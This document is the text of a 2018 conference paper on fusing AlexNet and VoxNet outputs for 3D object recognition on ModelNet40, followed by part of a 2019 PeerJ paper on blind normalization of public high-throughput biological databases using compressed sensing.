512066020@qq.com; b yffshun@163.com Abstract—Target recognition has always been a hot research topic in computer image and pattern recognition. This paper proposes a target recognition method based on decision layer fusion. ModelNet[1]—The 3D CAD model library，which is used to be identified. Features are extracted from the model's point cloud data and multi-view images. The image is identified using the AlexNet[2] network ,The point cloud is identified by the VoxNet[3] network. The fusion algorithm is used in the decision layer to complete the fusion of features. The results show that the proposed method improves the accuracy of object recognition. Keywords-Target Recognition; Convolutional Neural Network; Decision Fusion I. INTRODUCTION At present, the methods for identifying objects are mainly divided into two categories. The first is to identify the images generated by the objects, and the second is to identify the point clouds generated by the objects. In terms of image recognition, the current deep learning method has a high recognition rate. For instance, Xie etal. [4] adopt the multi-view depth image representation and propose multi-view deepextreme learning machine (MVD-ELM) to achieve fast and quality projective feature learning for 3D shapes. Zhu et al.[5] alsoproject 3D shapes into 2D space and use autoencoder for featurelearning on 2D images. In 2012, the ImageNet contest champion model--Alexnet became a classical convolutional neural network image classification model. For the identification of point clouds, domestic and foreign scholars have done a lot of research. Some scholars use the method of manually extracting features to classify and identify. R.B.Rusu[6]and others used the relationship between the normal vectors of a region as a feature to classify objects for recognition. Yasir Salihet al. [7] used VFH as a feature and used a support vector machine as a classifier to classify and recognize point clouds. Manually extracting features requires very professional knowledge and rich experience. Convolutional neural networks can automatically extract features and classify them, and they are invariant to displacements, scaling, and other forms of rigid body changes. Some experts and scholars have used convolutional neural networks to classify and recognize point cloud images, of which the VoxNet network has the highest recognition rate. The above method achieves higher accuracy in target classification recognition. I have seen that image recognition is affected by factors such as lighting and viewing angles. The accuracy of point cloud recognition is lower than that of image recognition. Therefore, this paper integrates the image and the point cloud at the decision-making level to improve the accuracy of object recognition. II. NETWORK STRUCTURE A. Convolutional neural network Traditional shallow learning methods such as support vector machines require manually extracting image features and then sending the features into the classifier for training. This leads to a problem that the manually extracted feature is not necessarily the best description of the current image. Even if the selected feature is very suitable for the current image, when the external conditions of the object such as the angle, size, and illumination of the image change, the manually selected feature cannot adapt well to this change, and it is necessary to artificially adjust the selected feature according to the situation. Different from the traditional shallow learning method, the input of the convolutional neural network is the entire image. It continuously adjusts the parameters of the network through a learning algorithm and adaptively extracts the most significant features of the current image, which avoids manual intervention and saves a large amount of manpower, with the continuous updating of the input pictures, the essential features of the current picture are extracted with the times, ensuring the accuracy and efficiency of the recognition. As a special architecture that is particularly suitable for classifying images, compared with conventional shallow machine learning methods such as support vector machines, convolutional neural networks can be much smaller than normal when faced with large-scale high-resolution image classification problems. The method learns more picture information in the training time, and the classification accuracy is higher than the conventional method, which is due to its unique network architecture. The convolutional neural network consists of three parts: the convolutional layer, the down-sampling layer and the fully connected layer. The down-sampling is usually after the convolutional layer, alternating with the convolutional layer, and finally connected to the fully connected layer. Convolutional neural networks use local connections, weight sharing, and spatial or temporal correlation down-sampling to obtain good translation, scaling, and distortion invariance, making the extracted features more distinguishable. CNNs 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 20 training includes forward propagation. The two processes of forward propagation and reverse propagation are the process of the input signal output from the input layer, through several hidden layers, and the output layer. The reverse propagation is the process of back propagation of the error signal from the output layer to the input layer. It mainly uses errors. The back propagation (Error Back Propagation, EBP) algorithm and gradient descent adjust the weights at each level of the network and is similar to the training process of an ordinary neural network. B. AlexNet network structure The standard convolutional neural network(CNN) is a special multilayer feed forward neural network. It has a deep network structure and is generally composed of an input layer, a convolutional layer, a down-sampling layer, a fully connected layer, and an output layer. The convolutional layer, the down-sampling layer, and the fully connected layer are hidden layers. AlexNet uses two GPU services. The model is divided into eight layers, five convolutional layers and three fully connected layers. Each convolutional layer contains the excitation function RELU and local response normalization (LRN) processing, and then after down-sampling (POOL). The network structure designed in this paper is shown in Figure 1. Figure 1. Multi-view image network structure diagram The input layer are images, there are 5 convolutional layers. The number of feature maps are 55, 27, 31, 13,and 6 features respectively. The convolution kernel sizes respectively are 11, 5, 3, 3, and 3,Below the first two convolutional layers there is a largest pooled layer with an LRN layer for localized normalization. The largest pooled layer is to take the maximum value of the feature points in the domain. After processing through the convolution layer, many features are obtained. The amount of direct calculation is very large, and the increase of features is particularly prone to overfitting. Therefore, the network constructed in this paper is Each time a convolution process is performed, a Max-Pooling layer is added. The Dropout layer has a discard rate of 0.5. Dropout temporarily discards some networks in the training process with a certain probability, and each mini-batch discards different networks. It can reduce the amount of calculation, and more importantly it can prevent over-fitting. The number of neurons in two fully connected layers is 256 and 10, respectively. The last output layer is the Softmax[6]layer, which does not directly output the classification of the identified image, but rather the probability that the output image belongs to each classification. C. VoxNet Network Structure Figure 2 shows the network structure of VoxNet. The input layer accepts data as a form. There are a total of two convolutional layers, and the number of feature maps is 32, using the sum of the convolution kernels. The Dropout layer discard rates are 0.2 and 0.3, respectively, to prevent overfitting while reducing the amount of computation. The largest pooled layer, the filter used. Finally, there is a fully connected layer with 128 neurons and a Dropout layer with a discard rate of 0.4. The seventh layer is the output layer and the number of neurons is 10. Input Layer Cov3d Layer Dropout Layer Cov3d Layer Fully Layer Dropout Layer Max Pool 3d Layer Dropout Layer Output Layer Figure 2. VoxNet network structure diagram D. Network convergence structure Multi sensor information fusion is to extract and integrate the same target image with a multi-source information channel for further processing. Information fusion can be divided into three layers: the fusion based on data layer, the fusion based on the feature layer, and the fusion based on the decision layer. The level of fusion was from low to high. So this paper uses the method of decision layer fusion. The feature fusion of the decision layer is usually the fusion of the prediction results of multiple classifiers. We extract various features from feature extraction algorithm. We assume that all kinds of features are independent of each other, and these features can separately predict the result of recognition separately. On this basis, we send data into their respective classifiers, get the prediction results of each classifier, then combine all the classifier's prediction to get the final recognition results, and complete the fusion of multiple features in the decision level. As shown in Figure 3, point cloud is extracted from VoxNet using point cloud feature, and AlexNet is used to extract image features. Softmax regression model is used to complete recognition and classification respectively. The fusion algorithm is used in the decision layer to complete the fusion of features. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 21 Figure 3. Fusion model III. . EXPERIMENTS A. Experiment environement The environment used in this experiment was TensorFlow-GPU 0.12.1 open source software library, Windows 7 operating system, and Nvidia GTX 950 graphics card. The data used in the experiment was ModelNet of Princeton University. ModelNet is a large-scale 3D CAD model database, similar to ImageNet in 2D images. B. Experiment Datasets This article uses the ModelNet40 dataset, where the point cloud dataset is from the dataset in PointNet[12], and the 2D image is from Multi-view. On the topside of Figure 4 is the point cloud image, at the bottom is a two-dimensional image. Figure 4. Point cloud image and two-dimensional image C. Linear Combination Coefficient Selection Static linear combination of the results of the AlexNet network and VoxNet network prediction results in the final prediction. Before linear combination, we need to determine the coefficients of each classifier's prediction result, which controls the relative importance of the results predicted by each classifier. It is very important to choose a suitable coefficient. The appropriate coefficient can fully exert the advantages of each classifier and make a joint decision. The final recognition accuracy rate will be better than the recognition accuracy of a single classifier. The use of inappropriate coefficients will result in the classification accuracy of the final joint decision even lower than that of a single classifier. There will be a Softmax classifier at the last level of the AlexNet and VoxNet network. For each input sample, the output of the Softmax classifier is a probability vector , that the sample may belong to. Where represents the probability that the sample belongs to class n, and n represents the number of classes of all samples. With , the sum of the probabilities that a sample belongs to all classes is 1. In the object recognition of a single classifier, we will choose the probability. The class label corresponding to the largest element in the vector is the class corresponding to the sample. In this chapter, for each test sample, the obtained recognition rate results are 、 , and the coefficients of each classifier are α and β respectively. Then we can complete the fusion of all base classifiers according to Eq. 1.   After the fusion is complete, we get a k-dimensional vector, where n is the number of categories. We take the largest element among them as the final sample tag. D. Recognition results In order to test the accuracy of this experimental method, the method of this paper is compared with the recognition accuracy of VoxNet and AlexNet. The experimental results are shown in Table 1. TABLE I. ACCURACY OF DIFFERENT METHODS recognition methods accuracy rate/% AlexNet 85 VoxNet 83 In this paper, the coefficients α and β before AlexNet and VoxNet are set to different values, the method with higher accuracy is used to set larger coefficients, the method with lower accuracy is set with smaller coefficients, and the comparison between different combinations of coefficients is 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 22 accurate for the network. influences. The experimental results are shown in Table 2. TABLE II. EFFECTS OF DIFFERENT COMBINATIONS OF COEFFICIENTS ON NETWORK ACCURACY weight（） accuracy/% （0.5，0.5） 79.8 （0.6，0.4） 81.2 （0.7，0.3） 91 （0.8，0.2） 87.5 （0.9，0.1） 86.3 From Table 2, the network has the highest recognition rate when α and β are set to 0.7 and 0.3. Compare this method with the recognition accuracy of VoxNet and AlexNet. Experimental results show that this method has the highest recognition rate. IV. CONCLUSION This paper presents a decision-level three-dimensional target fusion algorithm, we using different convolutional neural network frameworks to extract point cloud features and visual features of three-dimensional objects, respectively, and finally achieved effective fusion. Experimental results show that feature fusion in the decision-making layer is also an effective feature fusion method. This method improves the accuracy of object recognition. In the process of integration, a method with a higher recognition accuracy rate sets a larger coefficient, and a method with a low recognition accuracy rate sets a smaller coefficient, and the final accuracy rate is the highest. REFERENCES [1] Z. Wu, S. Song, A. Khosla, F. Yu, L. Zhang, X. Tang and J. Xiao. 3D ShapeNets: A Deep Representation for Volumetric Shapes. CVPR2015. [2] Krizhevsky A, Sutskever I, Hinton G E. ImageNet classification with deep convolutional neural networks[C]// International Conference on Neural Information Processing Systems. Curran Associates Inc. 2012:1097-1105. [3] D. Maturana and S. Scherer. VoxNet: A 3D Convolutional Neural Network for Real-Time Object Recognition. IROS2015. [4] H. Su, S. Maji, E. Kalogerakis, E. Learned-Miller. Multi-view Convolutional Neural Networks for 3D Shape Recognition. ICCV2015. [5] Charles R. Qi, Hao Su, Kaichun Mo, and Leonidas J. Guibas. PointNet: Deep Learning on Point Sets for 3D Classification and Segmentation. CVPR 2017. [6] Z. Xie, K. Xu, W. Shan, L. Liu, Y. Xiong, H. Huang, Projective feature learning for 3D shapes with multiview depth images, in: Computer Graphics Forum, vol.34, Wiley Online Library, 2015, pp.1–11. [7] Z. Zhu, X. Wang, S. Bai, C. Yao, X. Bai, Deep learning representation using autoencoder for 3D shape retrieval, in: Proceedings of the International Conference on Security, Pattern Analysis, and Cybernetics(SPAC), IEEE, 2014, pp.279–284. [8] Holz D, Holzer S, Rusu R B, et al. Real-Time Plane Segmentation Using RGB-D Cameras[C]// Robot Soccer World Cup XV. Springer-Verlag, 2012:306-317. [9] Salih Y, Malik A S. Comparison of stochastic filtering methods for 3D tracking[J]. Pattern Recognition, 2011, 44(10–11):2711-2737. [10] C. R. Qi, H. Su, M. Nießner, A. Dai, M. Yan, and L. Guibas.Volumetric and multi-view cnns for object classification on 3d data. In Proc. Computer Vision and Pattern Recognition (CVPR), IEEE, 2016. [11] http://www.cnblogs.com/graphics/archive/2010/08/05/1793393.html The Princeton ModelNet. http://modelnet.cs. [12] The Princeton ModelNet. http://modelnet.cs. [13] R. B. Girshick, J. Donahue, T. Darrell, and J. Malik. Rich feature hierarchies for accurate object detection and semantic segmentation. In Proc. CVPR, 2014. http://3dshapenets.cs.princeton.edu/ http://3dshapenets.cs.princeton.edu/ http://danielmaturana.net/extra/voxnet_maturana_scherer_iros15.pdf http://danielmaturana.net/extra/voxnet_maturana_scherer_iros15.pdf http://people.cs.umass.edu/~kalo/papers/viewbasedcnn/index.html http://people.cs.umass.edu/~kalo/papers/viewbasedcnn/index.html https://arxiv.org/abs/1612.00593 https://arxiv.org/abs/1612.00593 work_ld2ksivlgvd63cpdaez6tsr4ya ---- Submitted 27 September 2018 Accepted 7 October 2019 Published 11 November 2019 Corresponding author Sebastian Ohse, sebastian.ohse@mailbox.org Academic editor Shawn Gomez Additional Information and Declarations can be found on page 14 DOI 10.7717/peerj-cs.231 Copyright 2019 Ohse et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Blind normalization of public high- throughput databases Sebastian Ohse1, Melanie Boerries2,3,* and Hauke Busch4,* 1 Institute of Molecular Medicine and Cell Research, University of Freiburg, Freiburg, Germany 2 German Cancer Consortium (DKTK), German Cancer Research Center (DKFZ), Heidelberg, Germany 3 Institute of Medical Bioinformatics and Systems Medicine, Medical Center - University of Freiburg, Faculty of Medicine, University of Freiburg, Freiburg, Germany 4 Institute of Experimental Dermatology, University of Lübeck, Lübeck, Germany * These authors contributed equally to this work. ABSTRACT The rise of high-throughput technologies in the domain of molecular and cell biology, as well as medicine, has generated an unprecedented amount of quantitative high- dimensional data. Public databases at present make a wealth of this data available, but appropriate normalization is critical for meaningful analyses integrating different experiments and technologies. Without such normalization, meta-analyses can be difficult to perform and the potential to address shortcomings in experimental designs, such as inadequate replicates or controls with public data, is limited. Because of a lack of quantitative standards and insufficient annotation, large scale normalization across entire databases is currently limited to approaches that demand ad hoc assumptions about noise sources and the biological signal. By leveraging detectable redundancies in public databases, such as related samples and features, we show that blind normalization without constraints on noise sources and the biological signal is possible. The inherent recovery of confounding factors is formulated in the theoretical framework of com- pressed sensing and employs efficient optimization on manifolds. As public databases increase in size and offer more detectable redundancies, the proposed approach is able to scale to more complex confounding factors. In addition, the approach accounts for missing values and can incorporate spike-in controls. Our work presents a systematic approach to the blind normalization of public high-throughput databases. Subjects Bioinformatics, Data mining and Machine learning Keywords Blind normalization, High-throughput data, Compressed sensing, Confounding factors INTRODUCTION In the current age of biological science an unprecedented amount of quantitative high-dimensional data has been acquired and needs to be analyzed. In particular, high-throughput technologies in the domain of molecular and cell biology, as well as medicine, have led to a rise in the quantification of biological molecules that underlie fundamental cellular processes, such as gene expression, metabolic flux and protein signaling (see Fig. 1A). These fundamental processes as a whole orchestrate and underpin the dynamics of the cell (Joyce & Palsson, 2006). Most of the acquired high-throughput data and particularly transcriptome data is submitted to public databases for re-analysis and How to cite this article Ohse S, Boerries M, Busch H. 2019. Blind normalization of public high-throughput databases. PeerJ Comput. Sci. 5:e231 http://doi.org/10.7717/peerj-cs.231 https://peerj.com/computer-science mailto:sebastian.ohse@mailbox.org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.231 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.231 A B Figure 1 The rise of high-throughput technologies and associated normalization methods. (A) Sub- missions of RNA are based on NCBI’s Gene Expression Omnibus (Barrett et al., 2013), protein on EBI’s PRIDE database (Vizcaíno et al., 2016) and metabolite on EBI’s MetaboLights database (Haug et al., 2012). Notably, actual samples available are approximately an order of magnitude larger than the number of sub- missions. (B) Overview of common normalization methods from unsupervised to supervised learning. Full-size DOI: 10.7717/peerjcs.231/fig-1 reuse in research. Hence, researchers increasingly rely on samples from public databases to address shortcomings in experimental design, such as insufficient randomization or missing replicates. In addition, high-throughput data based meta-analyses are best performed with a large number of samples, such as across entire databases and different measurement technologies, in order to obtain insights applicable beyond a specific experimental setting. Thus, the development of data integration techniques is increasingly important. However, significant challenges remain. The overarching problem for data integration is that of normalization, which is becoming more apparent and limiting as the need for reuse and re-analysis of high-throughput data increases. Normalization involves the attenuation of bias resulting from confounding factors affecting the measurement process. Technical bias of an instrument or sample preparation procedure can be addressed by measuring identically processed quantitative standards. Use of such standards is widespread in serial technologies. The further up- stream in the measurement process quantitative standards are introduced, the more potential sources of bias can be accounted for. Biological bias due to non-identical cells or organisms is often addressed instead by randomization (Montgomery, 2008). This later approach presupposes that the contrast of interest and potential bias sources are known. An overview of potential bias sources with a focus on high-throughput technologies is given by Lazar et al. (2012). High-throughput technologies are challenging to normalize especially because the bias of biological molecules measured in parallel is not independent. Such non-independent bias stems from molecular interactions throughout the measurement process, including sample preparation procedures and instrument settings that are dependent on the measured sample itself and its biological Ohse et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.231 2/16 https://peerj.com https://doi.org/10.7717/peerjcs.231/fig-1 http://dx.doi.org/10.7717/peerj-cs.231 signal. Quantitative measurement standards must therefore effectively cover a vast number of possible combinations of potential signal measured. In addition, measurement process or instrument components are sometimes one-time-use, such as in the case of microarray technologies, making appropriate normalization with measurement standards unfeasible. In part for these reasons, high-throughput technologies have been designed with a focus on relative comparisons, such as fold changes, rather than absolute quantification. While a limited number of spike-in standards can account for some technical bias (Lovén et al., 2012) sample preparation procedures that are important sources of bias, such as library preparation, protein extraction or metabolic labeling, generally happen up-stream of spike-in addition. Bias attenuation by randomization is not generally possible, as contrasts of interest are not initially known in the exploratory analyses typically performed with high-throughput technologies. The initial experimental design establishes how quantitative measurement standards or randomization are employed in a particular experiment. However, in the case of experiments that draw on samples from public databases, the attenuation of bias must be done post hoc. Attempts at such normalization have produced different methods across the spectrum of unsupervised to supervised learning (see Fig. 1B). Unsupervised approaches generally make use of ad hoc assumptions about noise sources or the biological signal, which are then leveraged in an attempt to average out bias. While early methods were concerned with simple centering and scaling (Cheadle et al., 2003), more recent approaches assume that an appropriate scaling is obtained by scaling across features, such as through variance stabilization (Huber et al., 2002), or by scaling across samples, such as through quantile normalization (Bolstad et al., 2003; Irizarry et al., 2003). The later approach is widely used but requires the assumption that the overall biological signal does not vary significantly between samples. Another major drawback is that unsupervised approaches fail to exploit the wealth of information available in public high-throughput databases. Semi-supervised approaches implicitly or explicitly exploit additional data to learn parameters that can then be transferred to the dataset at hand. In particular, frozen SVA (Parker, Corrada Bravo & Leek, 2014), frozen RMA (McCall et al., 2011) and the Gene Expression Commons (Seita et al., 2012) take such an approach. The later methods aim to adjust the weight and scale parameters of the measured features based on global distributions obtained by the use of additional data. However, the frozen SVA method requires prior knowledge of the contrast of interest for the additional data to be of use and is therefore impractical in the case of exploratory analyses. The frozen RMA approach is based on quantile normalization and thus makes equally restrictive assumptions about the biological signal. Supervised approaches make use of replicate samples or prior knowledge of potential confounding factors and contrasts of interest. If the contrast of interest has replicate samples overlapping with known confounding factors, these replicates can subsequently be used to remove bias; for example, through simple centering (Li & Wong, 2001) or more complex non-linear adjustments (Benito et al., 2004). In the case of small sample sizes, the popular empirical Bayes method ComBat (Johnson, Li & Rabinovic, 2007) can be applied. Ohse et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.231 3/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.231 However, any supervised methods is unable to detect and remove bias outside of a setting that includes replicate samples specifically designed to limit known confounding factors, or alternatively, prior knowledge of the contrast of interest. Unfortunately, as annotation of high-throughput data with respect to sample information and the experimental protocol used is often insufficient and too incoherent for machine processing, supervised approaches to normalization are generally unfeasible for public databases. The blind compressive normalization algorithm developed here makes use of the sparsity assumption combined with the identification and use of detectable redundancies in high-throughput databases to normalize for unknown confounding factors. The sparsity assumption is the well motivated assumption that signals of interest generally lie on low dimensional manifolds (Hastie, Tibshirani & Wainwright, 2015). In the framework of compressed sensing it enables blind recovery of bias and subsequent normalization of high-throughput databases from merely estimated redundancies, such as correlations in that data. Compressed sensing is a recent field that studies the ability to accurately reconstruct signals of interested based on very few measurements (below the Nyquist sampling rate) (Candès & Wakin, 2008). We sidestep more restrictive assumptions on the biological signal or noise sources common in unsupervised normalization approaches and do not require prior knowledge of the contrast of interest or appropriate sample annotation as required for supervised normalization approaches. For the biological or medical researcher working with high-throughput data this means that when blind compressive normalization can be successfully applied to a database that includes their samples of interest, these samples are subsequently more comparable to each other and overall to other samples in the database, as bias stemming from unknown confounding factors is attenuated. METHODS The challenge of normalizing large high-throughput databases is distinct from the traditional p � n problem (Friedman, Hastie & Tibshirani, 2001) often encountered in high-throughput data normalization. The number of features (p) and the number of samples (n) in public high-throughput databases is currently large and on the same order of magnitude (p ≈ n). Therefore, computational scalability becomes an important consideration. Recent advances in the field of machine learning, based on the sparsity assumption, have shown that limited sampling of high-dimensional data is often sufficient for efficient signal recovery. For example, in the area of collaborative filtering, large low-rank matrices are routinely recovered from a small number of sampled entries (Mazumder, Hastie & Tibshirani, 2010; Jain, Netrapalli & Sanghavi, 2013; Vandereycken, 2013). If confounding factors in high-throughput databases are equally amenable to the sparsity assumption, bias due to the measurement process may be recoverable from a relatively small number of measured quantitative standards. Since such standards are not available or feasible to obtain post hoc, we propose instead to utilize database wide redundancies to obtain the necessary constraints that enable bias recovery and subsequent normalization. Our approach begins with the assumption that there are a limited number of confounding factors that markedly affect the measurement process. Thus, the bias is Ohse et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.231 4/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.231 Figure 2 Blind recovery of bias. A database consisting of features, such as measurements of RNA, pro- tein or metabolite and samples, such as different cell types under various stimuli, is observed. Recovery of the underlying bias (purple) is feasible if some redundant underlying signal (orange) exists that is incoher- ent to the bias and partially detectable by observation (red). Redundancies can be categorized as detectable and as weak or strong based on the correlation strength between features or samples. The more redundant a signal is the closer it falls on the perfect correlation line. Full-size DOI: 10.7717/peerjcs.231/fig-2 modeled as a low-dimensional manifold that takes the form of low-rank matrix (see Fig. 2) denoted as X. This is a flexible model which can approximate arbitrarily close any underlying bias. Opposed to traditional signal recovery approaches, we specifically model the bias (systematic noise) instead of the potentially complex signal. In the framework of compressed sensing the respective matrix recovery problem resulting in the recovery of X, is defined as follows (Tan et al., 2014). Definition 1 Given a linear operator A :Rn×m →Rp, let y=A(X)+� be a set of p measurements of an unknown rank r̂ matrix X∈Rn×m and noise �. Matrix recovery solves the problem of minX ∥∥y−A(X)∥∥22 subject to rank(X)≤r, where p�nm and r ≥ r̂. Ohse et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.231 5/16 https://peerj.com https://doi.org/10.7717/peerjcs.231/fig-2 http://dx.doi.org/10.7717/peerj-cs.231 The specific type of linear operator used depends on the context and is commonly defined as the Frobenius inner product of X and sensing matrices {Ai ∈Rn×m}i=1,...,p such that yi= ∑n j=1 ∑m k=1(Ai)jkXjk. In the general case of dense sensing, for which various recovery guarantees have been established (Candes & Plan, 2011), sensing matrices Ai are defined ∀j ∈{1,...,n} and ∀k ∈{1,...,m} as (Ai)jk ∼N . However, this approach at bias recovery presupposes a measurement setup that provides constraints (e.g., prior information) about Ai and yi to recover X according to Definition 1. Such prior information is typically not available, but we show that it can be indirectly obtained from an approximation of the redundancies that commonly exists in high-throughput databases (see ‘Blind recovery’). But first, before focusing on the case of blind recovery, we introduce the intermediate case of k-sparse recovery of which blind recovery is an extension. K-sparse recovery Several modifications to the traditional approach of matrix recovery through dense sensing exist, including row and column only or rank-1 based sensing matrices (Wagner & Zuk, 2015; Cai & Zhang, 2015; Zhong, Jain & Dhillon, 2015). The common case of entry sensing can be seen as a special case of dense sensing (Candes & Plan, 2010) that requires additional assumptions for guaranteed recovery and knowledge of specific entries of X. It is the simplest form of k-sparse recovery, where each sensing matrix is 1-sparse (contains only one nonzero entry). If sufficient quantitative standards or spike-ins were available to obtain estimates at specific nonzero entries �(s1,t1) of X from high-throughput databases, then post hoc bias recovery through entry sensing would be possible, with s1 ∼Uniform({1,...,n}), t1 ∼Uniform({1,...,m}) and yi =Xs1t1. In this case the 1-sparse sensing matrices Ai are defined as: (Ai)jk { ∼1 if(j,k)=(s1,t1) =0 otherwise (1) The next level of complexity of k-sparse recovery is a 2-sparse sensing matrix based approach, with entries �(s1,t1)(s2,t2) chosen uniformly at random as before and (s1,t1) 6=(s2,t2). In this case the 2-sparse sensing matrices Ai are defined as: (Ai)jk { ∼N if(j,k)∈{(s1,t1),(s2,t2)} =0 otherwise (2) Analogously as for the dense sensing approach, k-sparse recovery presupposes a measurement setup that provides prior information about Ai and yi to recover X. It differs from dense sensing by the random sparsification of measurement operators (see Eq. (2)). We use k-sparse recovery as an intermediate step to blind recovery, where inaccuracies due to the additional estimation step of blind recovery are controlled for in order to allow simple evaluation (see ‘Results’). Blind recovery In blind recovery we show how to estimate the necessary constraints (e.g., prior information) about Ai and yi from the observed signal O (see Fig. 2). The 2-sparse Ohse et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.231 6/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.231 Figure 3 Measurement inference process from detected redundancies to bias constraints required for recovery. In feature space a redundancy is detected. A sample B allows the characterization of d and slope σ1 σ2 . The corresponding bias constraint based on B is denoted in this new feature space, where d character- izes the offset from the origin. All bias estimates are constrained by the given curve (purple). Full-size DOI: 10.7717/peerjcs.231/fig-3 sensing matrices Ai and respective measurements yi are defined as: (Ai)jk   = σ̂(Os1∗) if(j,k)=(s1,x) = σ̂(Os2∗) if(j,k)=(s2,x) =0 otherwise (3) yi= σ̂(Os2∗)ds2−σ̂(Os1∗)ds1 (4) where σ̂(Os1∗) and σ̂(Os2∗) are estimates of the standard deviation of the corresponding rows Os1∗ and Os2∗ of the observed signal, respectively. Specifically, the values for entries �(s1,x)(s2,x) of 2-sparse sensing matrices Ai are determined by redundancy information, such as correlations between features and samples, which must be estimated from O. Furthermore, [ds1,ds2] is the orthogonal vector from point (Os1x,Os2x) to the line crossing the origin with slope σ̂(Os1∗)/σ̂(Os2∗) in the space of rows Os1∗ and Os2∗ (see Fig. 3). Thus, yi can be reconstructed from relative constraints encoded in the correlations of O. Without specifying an absolute value for a specific entry, but by specifying a correlation between two particular features, the bias is constrained by the line which goes through point (Os1x,Os2x), given that the observed matrix is centered. Since redundancies not only exist for features but also samples, the transpose of the observed signal OT and its corresponding matrix entries �T(sA,v)(sB,v) are used equivalently. Thus, while s1/sA and s2/sB specify a correlated pair of rows/columns, x/v specifies a particular observation in the space of that correlated pair (see Fig. 3). With linear operator A, bias X and measurements y defined accordingly, the standard matrix recovery problem given in Definition 1 is then solved by Riemannian optimization (Vandereycken, 2013), specifically with the Pymanopt implementation (Townsend, Koep & Weichwald, 2016). Ohse et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.231 7/16 https://peerj.com https://doi.org/10.7717/peerjcs.231/fig-3 http://dx.doi.org/10.7717/peerj-cs.231 Simulation We conduct a series of simulations to empirically evaluate the performance and robustness of the k-sparse recovery and blind recovery approaches. To this end a synthetic high- throughput database is generated (see Data Availability) by combining an underlying redundant signal S with a known low-rank bias X to be recovered. We generate the redundant signal S from a matrix normal distribution. This is a common model for high- throughput data (Allen & Tibshirani, 2012). Specifically, S∼MN n×p(M,AAT,BT B), where M denotes the mean matrix and both AAT and BT B denote the covariance matrices describing the redundancies in feature and sample space, respectively. Sampling is performed by drawing from a multivariate normal distribution N∼MN n×p(0,I,I) and transforming according to S=M+ANB. Importantly, different features and samples have different standard deviations, which are used in the construction of the covariance matrices (in combination with random binary block structured correlation matrices). Ideally, the standard deviations follow a sub-gaussian distribution (Candès & Wakin, 2008). Missing values are modeled according to missing at random (MAR) or missing not at random (MNAR) scenarios. The bias to be recovered is modeled as a random low-rank matrix X=U6VT with 6 generated from diag(σ1,...,σm). Eigenvalues are denoted as σ and are sampled from Uniform(0,1). Matrix rank is denoted by m. Eigenvectors U and V are obtained from Stiefel manifolds generated by the QR decomposition of a random normal matrix (Townsend, Koep & Weichwald, 2016). Both redundant signal S and low-rank bias X are combined additively to yield the observed signal matrix O=X+S. The signal-to-noise ratio is kept approximately constant across bias matrices of different rank by scaling the eigenvalues of X to an appropriate noise amplitude. RESULTS Recovery performance Our performance evaluation starts with the case of k-sparse recovery shown in Figs. 4A–4C and derived in ‘K-sparse Recovery’. In our setup, the difference in measurement operator construction between sparse and dense sensing has little effect on the performance. Initial differences levels off rapidly as shown in Fig. 4A. Notably, in Fig. 4A we observe no significant difference in performance between a 4-sparse and 8-sparse measurement operator. The storage requirements for the dense sensing variant become prohibitive quickly (Cai & Zhang, 2015) and therefore we do not simulate above 8-sparse measurement operators. In Fig. 4B we highlight the advantageous scaling behavior of the 2-sparse approach. This allows reconstruction of bias from a small percentage of potential measurements of large high-throughput databases. Therefore, for databases on the order of tens of thousands of features and samples, only a small fraction of correlations need to be considered in order to reconstruct the low-dimensional model of the bias X. Thus, when estimating correlations and corresponding standard deviations from the data in the case of blind recovery, high-specificity and low-sensitivity estimators can be used; as high-sensitivity is not required with an overabundance of measurements and the focus can be placed on high-specificity instead. The non-perfect recovery in the top right of Ohse et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.231 8/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.231 Figure 4 Performance of 2-sparse and blind recovery. (A) Decreasing the sparsity of the measurement operator from 2 to 10-sparse shows a leveling-off effect (rank-2, 50×50). (B) Scalability of 2-sparse re- covery overlaid with model O(c0r(n + m)) (Wei et al., 2016) (white dashed line). The larger the high- throughput database the more likely is reconstruction of more complex noise structures from a small per- centage of measurements (rank-2). (C, D) Evaluation of the proof-of-concept for the 2-sparse case and blind recovery of bias with increasing noise complexity (50×50). Full-size DOI: 10.7717/peerjcs.231/fig-4 Fig. 4B is likely due to convergence failure of the conjugate gradient optimizer, because of a heavily overdetermined recovery setting. It can can be ameliorated by decreasing the number of considered measurements. In Fig. 4C the performance is shown for increasingly complex bias from rank-1 to rank-20. The necessary measurements required for improved recovery in the case of a worst-case correlation structure (e.g., maximally 2,500 possible measurements) are feasible to obtain up to a noise complexity of rank-9. In the best-case scenario (e.g., maximally 60,000 possible measurements) measurements are feasible to Ohse et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.231 9/16 https://peerj.com https://doi.org/10.7717/peerjcs.231/fig-4 http://dx.doi.org/10.7717/peerj-cs.231 obtain up to at least rank-20. Notably, recovery is performed for matrix dimensions of 50×50 and thus the scaling behavior observed in Fig. 4B may improve performance depending on the size of the database considered. In Fig. 4D we evaluate blind recovery performance, where as opposed to k-sparse recovery with 2-sparse sensing matrices, entries are not sampled from a Gaussian distribution, but constructed post hoc from known or estimated correlations. For purposes of comparison with the k-sparse recovery based on 2-sparse sensing matrices, we force accurate estimation of correlations and corresponding standard deviations. No significant difference in performance between blind and 2-sparse recovery are observed for this setup, as shown in Figs. 4C–4D. Thus, recovery is feasible when the redundancies obtained in feature and sample space are estimated accurately and are sufficiently incoherent with the low-rank bias X. Discrepancies in perfect recovery between the bottom left of Figs. 4D and 4C are likely due to constraints in the construction of the measurement operator; only full rows and columns are considered for blind 